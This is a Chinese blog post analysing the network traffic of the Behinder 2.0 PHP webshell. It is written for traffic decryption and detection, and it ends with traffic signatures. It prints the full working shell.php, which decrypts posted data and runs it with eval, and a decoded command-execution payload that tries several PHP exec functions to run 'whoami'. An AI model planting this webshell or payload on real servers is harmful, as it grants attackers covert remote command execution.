behinder2.0流量分析(PHP)
冰蝎为一款主流Webshell管理工具,本篇分析Benhinder2.0中php shell流量。
Github:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v2.0
测试环境:1
2
3Win7
PhpStudy
Behinder2.0
为了方便测试,php需开启openssl插件。
Behinder内置Webshell,在server目录下
shell.php内容如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33?>
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
}
代码中我们可以看出,若开启了openssl,则会采用AES128->base64进行解密,若未开启openssl,则会使用base64->异或进行解密。
将/server/shell.php放置在phpstudy网站目录中,使用Behinder2.0进行连接,默认密码为pass
成功连接
流量解密
这里为了直观我将流量代理至burp进行分析
再次打开webshell,burp中发现以下流量包
Behinder前两次会进行密钥的获取和更新,我们需要获取第二次的密钥,也就是这里的7e42737bc70ea538,第三个包会确定content参数的值,第四个包会获取phpinfo系信息(这几步你可以看完下面的解密方式之后再回过头来看到底做了什么)
获取到了之后,由于Behinder2.0流量传输是使用的AES加密,我们可以获取秘钥之后可以进行解密
AES解密:http://tools.bugscaner.com/cryptoaes/
Base64解密:https://tool.oschina.net/encrypt?type=3
这里在Behinder中通过cmd查询当前用户
POST请求数据如下:1
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
使用之前获取的秘钥进行解密:
AES解密之后将base64_decode中的内容进行base64解密能还原出请求的php代码1
QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsNCiAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAka2V5KTsNCiAgICAgICAgcmV0dXJuOw0KICAgICAgICANCiAgICB9DQogICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGdldFNhZmVTdHIoJGtXSlcpKTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICAkX1NFU1NJT05bJ2snXSk7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JGNtZD0id2hvYW1pIjsNCm1haW4oJGNtZCk7
1 | @error_reporting(0); |
可以在最后几行看出执行了系统命令
同样我们可以通过AES->base64解密返回包看到返回的结果
1 | 原始返回数据: |
同理,我们可以分析出Behinder其他功能实现的相关代码。
流量特征
1.十六位秘钥
2.Get请求pass参数
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com
文章标题:behinder2.0流量分析(PHP)
本文作者:sher10ck
发布时间:2021-06-23, 10:02:45
最后更新:2021-06-23, 16:35:00
原始链接:http://sherlocz.github.io/2021/06/23/behinder2-analysis/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。